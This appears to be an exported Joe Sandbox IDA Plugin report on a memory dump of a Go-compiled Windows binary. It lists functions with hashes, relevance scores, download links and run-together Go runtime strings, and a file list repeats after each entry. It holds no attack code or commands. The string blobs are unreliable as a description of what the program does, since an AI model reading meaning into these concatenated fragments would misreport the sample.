Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519M$ MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from RegDeleteKeyWRegEnumValueWempty integer$pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in goselectgo: bad wakeupsemaRoot rotateRight
API String ID: 0-222072189
Opcode ID: f5ba33beb20d4a133d7a7e0fc07c1851163a883c08fbf3f8ea8bcee7d00c8a40
Instruction ID: 9cc2341723d4e1f3ee616e9712592c6a691f585ee91a69c5ed2f4a1d9aced033
Opcode Fuzzy Hash: f5ba33beb20d4a133d7a7e0fc07c1851163a883c08fbf3f8ea8bcee7d00c8a40
Instruction Fuzzy Hash: D271C532519F94C9D601EF65E4403AAB7E4FB9ABC0F449766EA5E27725CF38C481C740

Uniqueness

Uniqueness Score: -1.00%

Function 00B98680 Relevance: 3.6, Strings: 2, Instructions: 1095COMMON

Download Yara Rule

Strings

gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLoadMUIStringWdQw4w9WgXcQ:[^"]*integer too large060102150405Z0700multipartmaxpartsmessage too largeWrite after CloseSystemFunction036decryption failedhands, xrefs: 00B99305
selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorysql: Rows are closedasn1: syntax error: GetAdaptersAddressesGetProcessMemoryInfounknown PSK identitycertificate requiredinvalid DNS responsegetadaptersaddresses, xrefs: 00B992DB

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLoadMUIStringWdQw4w9WgXcQ:[^"]*integer too large060102150405Z0700multipartmaxpartsmessage too largeWrite after CloseSystemFunction036decryption failedhands$selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorysql: Rows are closedasn1: syntax error: GetAdaptersAddressesGetProcessMemoryInfounknown PSK identitycertificate requiredinvalid DNS responsegetadaptersaddresses
API String ID: 0-3307806265
Opcode ID: 40eb60451f1d83f86bccc2d84e9d70a1af9ecb89b41377bd0ca52599329025be
Instruction ID: 038000e1d02f877b8227c76241edd8b2866dc0c8f5de0aec6fe74317e1c89285
Opcode Fuzzy Hash: 40eb60451f1d83f86bccc2d84e9d70a1af9ecb89b41377bd0ca52599329025be
Instruction Fuzzy Hash: E4B28A32208B90C2DB60CF16E4847AE77A8F389BD4F56956AEE9D47755CF78C894C700

Uniqueness

Uniqueness Score: -1.00%

Function 00BC08C0 Relevance: 2.8, Strings: 2, Instructions: 330COMMON

Download Yara Rule

Strings

reflectlite.Value.IsNil23283064365386962890625reflect.Value.Interfacereflect.Value.NumMethodjson: cannot unmarshal into Go value of type unexpected map key typeunknown error code 0x%xframe_goaway_has_streamframe_headers_pad_shortframe_rststream_bad_lenmalform, xrefs: 00BC0DAD
reflectlite.Value.Type4656612873077392578125unexpected method stepreflect.Value.MapIndexreflect.Value.SetFloat to array with length into Go struct field json: unknown field %qhttp2: frame too largewrite on closed bufferframe_data_pad_too_bigaccess-control-max, xrefs: 00BC0DE3

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: reflectlite.Value.IsNil23283064365386962890625reflect.Value.Interfacereflect.Value.NumMethodjson: cannot unmarshal into Go value of type unexpected map key typeunknown error code 0x%xframe_goaway_has_streamframe_headers_pad_shortframe_rststream_bad_lenmalform$reflectlite.Value.Type4656612873077392578125unexpected method stepreflect.Value.MapIndexreflect.Value.SetFloat to array with length into Go struct field json: unknown field %qhttp2: frame too largewrite on closed bufferframe_data_pad_too_bigaccess-control-max
API String ID: 0-774687007
Opcode ID: 8c17dbf1c4c4905ebf88e24d2559cc157d753863bf7c277357d5fc18eb30e76c
Instruction ID: 115a1df56cb15c96d20d97106d1c7687c0c4a3a658ef6eb400871586445e0a94
Opcode Fuzzy Hash: 8c17dbf1c4c4905ebf88e24d2559cc157d753863bf7c277357d5fc18eb30e76c
Instruction Fuzzy Hash: 70D18576218B84C1EB24DF15F480BAAB3E5F789B84F58856AEE8D53B25DF78C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B813C0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

runtime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unpaired removeDep: no %T dep on %Tsuperfluous leading zeros in lengthform-data; name, xrefs: 00B815A6
runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:, xrefs: 00B8153D

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: runtime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unpaired removeDep: no %T dep on %Tsuperfluous leading zeros in lengthform-data; name$runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:
API String ID: 0-3538999567
Opcode ID: 099bcd41a0796116d7029dbc02e716d3cf1b229c4c8b0f231624c8619c116296
Instruction ID: f01a56635ae00d8d27f9ecc78dc09edff8e8885eb3981640bece1b9fd35125c5
Opcode Fuzzy Hash: 099bcd41a0796116d7029dbc02e716d3cf1b229c4c8b0f231624c8619c116296
Instruction Fuzzy Hash: D651C62320B74485CF14EB29E09036BABE5E796B90F5859A9EA9F43B75DB38C445C700

Uniqueness

Uniqueness Score: -1.00%

Function 00BEAA00 Relevance: 1.9, Strings: 1, Instructions: 686COMMON

Download Yara Rule

Strings

p, xrefs: 00BEB16D

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 240dfa91364e46fae89d7056de7e8892b9a76cda0002a122152fa7a6400d686c
Instruction ID: 2243e91cbfe9f2190386ec74251ca528c9158f2676b286f4e5e729d75de5fc53
Opcode Fuzzy Hash: 240dfa91364e46fae89d7056de7e8892b9a76cda0002a122152fa7a6400d686c
Instruction Fuzzy Hash: 1B62FC36609BC485DB719B16F8903ABB3A5F789B80F489166DECD47B19DF38D498CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00BCE440 Relevance: 1.8, Strings: 1, Instructions: 548COMMON

Download Yara Rule

Strings

\, xrefs: 00BCE667

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 48b92ae07cfead8f71134261281d994dc981dc1b41c8b640bf2c4daf2e504c28
Instruction ID: 178591bed28142dabbcbb0b92c2c5f8899a67e8f3449425fa23abfef959456c1
Opcode Fuzzy Hash: 48b92ae07cfead8f71134261281d994dc981dc1b41c8b640bf2c4daf2e504c28
Instruction Fuzzy Hash: 68227262708AC4C1CB24CF66E490BAEA7A1F385BD0F48856ADE9E57B59DF7CC485C700

Uniqueness

Uniqueness Score: -1.00%

Function 00BA66A0 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

invalid length of trace eventruntime: traceback stuck. pc=runtime: impossible type kindruntime.semasleep wait_failedinteger not minimally-encodedzero length OBJECT IDENTIFIER20060102150405.999999999Z0700pkcs12: odd-length BMP stringpadding contained in alphabe, xrefs: 00BA6964

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: invalid length of trace eventruntime: traceback stuck. pc=runtime: impossible type kindruntime.semasleep wait_failedinteger not minimally-encodedzero length OBJECT IDENTIFIER20060102150405.999999999Z0700pkcs12: odd-length BMP stringpadding contained in alphabe
API String ID: 0-2550597867
Opcode ID: a7db34e892b4dffced2a318a90b5f3d2f66834ec34324f1c84b2d35fa7179d59
Instruction ID: ba33cbb1cf21007ae3879e333a98323dff7918d8711384e187bcc3d8f74b8a04
Opcode Fuzzy Hash: a7db34e892b4dffced2a318a90b5f3d2f66834ec34324f1c84b2d35fa7179d59
Instruction Fuzzy Hash: 67D1E5B271DB88C6DB548B15E0903AA77A1F396BC0F588166EF9A07B94CF38C491CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6520 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

ParseFloatcomplex128t.Kind == for type ConnectionSet-Cookie stream=%dset-cookiekeep-alive:authorityconnectionHost: %ssocks bindProcessingNo Content%s|%s%s|%sRST_STREAMEND_STREAMexecerrdotSYSTEMROOTChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_Italic, xrefs: 00BC6786, 00BC685E, 00BC6926

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: ParseFloatcomplex128t.Kind == for type ConnectionSet-Cookie stream=%dset-cookiekeep-alive:authorityconnectionHost: %ssocks bindProcessingNo Content%s|%s%s|%sRST_STREAMEND_STREAMexecerrdotSYSTEMROOTChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_Italic
API String ID: 0-3071403547
Opcode ID: 3c9097083d378a220eece77810bdc007557bf6ca6f155b9ca556c8752b436fee
Instruction ID: ee1b9a7fa6b8b39c004173a5ba8002981395fbfcce52206aa308a4ea17e616a3
Opcode Fuzzy Hash: 3c9097083d378a220eece77810bdc007557bf6ca6f155b9ca556c8752b436fee
Instruction Fuzzy Hash: D2C18172208B84C5CB24DF11F4807AAB7E4F789B84F88956AEB8D57B29DF78C594C740

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6A00 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

ParseFloatcomplex128t.Kind == for type ConnectionSet-Cookie stream=%dset-cookiekeep-alive:authorityconnectionHost: %ssocks bindProcessingNo Content%s|%s%s|%sRST_STREAMEND_STREAMexecerrdotSYSTEMROOTChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_Italic, xrefs: 00BC6C46, 00BC6D1F, 00BC6DE6

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
